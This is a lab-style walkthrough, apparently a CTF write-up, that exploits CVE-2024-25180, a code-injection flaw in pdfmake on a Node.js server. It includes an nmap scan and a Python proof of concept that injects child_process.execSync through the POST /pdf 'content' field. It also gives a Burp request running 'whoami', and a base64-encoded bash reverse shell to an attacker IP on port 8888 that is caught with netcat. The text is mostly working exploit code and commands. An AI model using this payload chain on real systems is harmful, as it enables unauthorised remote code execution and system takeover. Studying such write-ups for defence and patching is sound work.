Skip to content

CVE-2024-25180

Nov 07, 2024

Port scan

$ sudo nmap 192.168.208.42 -p- -Pn -sCV --min-rate=1000
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1234/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 1234 PDFMake

http://192.168.208.42:1234/

alt text

// playground requires you to assign document definition to a variable called dd

var dd = {
    content: [
        'First paragraph',
        'Another paragraph, this time a little bit longer to make sure, this line will be divided into at least two lines'
    ]

}

Arbitrary Code Injection in pdfmake

Overview

pdfmake is a Client/server side PDF printing in pure JavaScript

Affected versions of this package are vulnerable to Arbitrary Code Injection via a crafted POST request to the /pdf path. An attacker can execute arbitrary code on the system by sending a specially crafted request.

PoC

import requests

data = {
    "content": "this.process.mainModule.require('child_process').execSync('<COMMAND>').toString(); const dd = 2"
}

resp = requests.post("http://ip:port/pdf", data=data)
print(resp.text)

Use BurpSuite

POST /pdf HTTP/1.1
Host: 192.168.208.42:1234
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 106
Origin: http://192.168.208.42:1234
Connection: close
Referer: http://192.168.208.42:1234/

{"content":"this.process.mainModule.require('child_process').execSync('whoami').toString(); const dd = 2"}

alt text

Got an TypeError which confirms that we have code exection

$ echo 'bash -i >& /dev/tcp/192.168.45.179/8888 0>&1' | base64                  
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3OS84ODg4IDA+JjEK


{"content":"this.process.mainModule.require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3OS84ODg4IDA+JjEK | base64 -d | bash').toString(); const dd = 2"}

$ nc -nvlp 8888

alt text